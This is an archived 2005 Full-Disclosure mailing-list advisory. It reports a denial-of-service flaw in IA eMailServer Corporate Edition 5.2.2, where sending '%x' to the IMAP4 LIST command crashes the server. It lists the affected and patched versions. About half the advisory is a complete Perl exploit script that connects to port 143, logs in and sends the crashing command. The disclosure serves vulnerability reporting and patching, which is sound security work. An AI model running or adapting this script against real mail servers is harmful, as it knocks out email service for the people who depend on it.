[Full-disclosure] Denial of Service Vulnerability in True North Software, Inc. IA eMailServer Corporate Edition Version: 5.2.2. Build: 1051.

From: Reed Arvin (reedarvin_at_gmail.com)
Date: 06/27/05

Next message: Marcus Meissner: "[Full-disclosure] SUSE Security Announcement: RealPlayer remote buffer overflow (SUSE-SA:2005:037)"

Previous message: FistFucker: "Re: [Full-disclosure] PHP: Calendar Buffer Overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Mon, 27 Jun 2005 01:02:10 -0700
To: full-disclosure@lists.grok.org.uk, vuln@secunia.com, news@securiteam.com

Summary:
Denial of Service Vulnerability in True North Software, Inc. IA
eMailServer Corporate Edition Version: 5.2.2. Build: 1051.
(http://www.tnsoft.com/)

Details:
Input to the IMAP4 LIST command is not properly checked and/or
filtered. Issuing a single character '%x' as the second argument to
the LIST command will cause the MailServer.exe process to die.

Vulnerable Versions:
True North Software, Inc. IA eMailServer Corporate Edition Version:
5.2.2. Build: 1051.

Patches/Workarounds:
IA eMailServer Corporate Edition Version: 5.3.4. Build: 2019. is not
vulnerable to this attack. It is available at http://www.tnsoft.com/.

Exploit:
Run the following PERL script against the server. The process will die.

#===== Start IAeMailServer_DOS.pl =====
#
# Usage: IAeMailServer_DOS.pl <ip>
# IAeMailServer_DOS.pl 127.0.0.1
#
# True North Software, Inc. IA eMailServer Corporate Edition
# Version: 5.2.2. Build: 1051.
#
# Download:
# http://www.tnsoft.com/
#
#############################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "143",
                                    Proto => "TCP"))
{
        print "Attempting to kill IA eMailServer at $ARGV[0]:143...";

sleep(1);

print $socket "0000 LOGIN hello moto\r\n";

sleep(1);

print $socket "0001 LIST 1 \%x\r\n";

close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:143\n";
}
#===== End IAeMailServer_DOS.pl =====

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/)

Vulnerability discovered using PeachFuzz
(http://reedarvin.thearvins.com/tools.html)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Next message: Marcus Meissner: "[Full-disclosure] SUSE Security Announcement: RealPlayer remote buffer overflow (SUSE-SA:2005:037)"

Previous message: FistFucker: "Re: [Full-disclosure] PHP: Calendar Buffer Overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]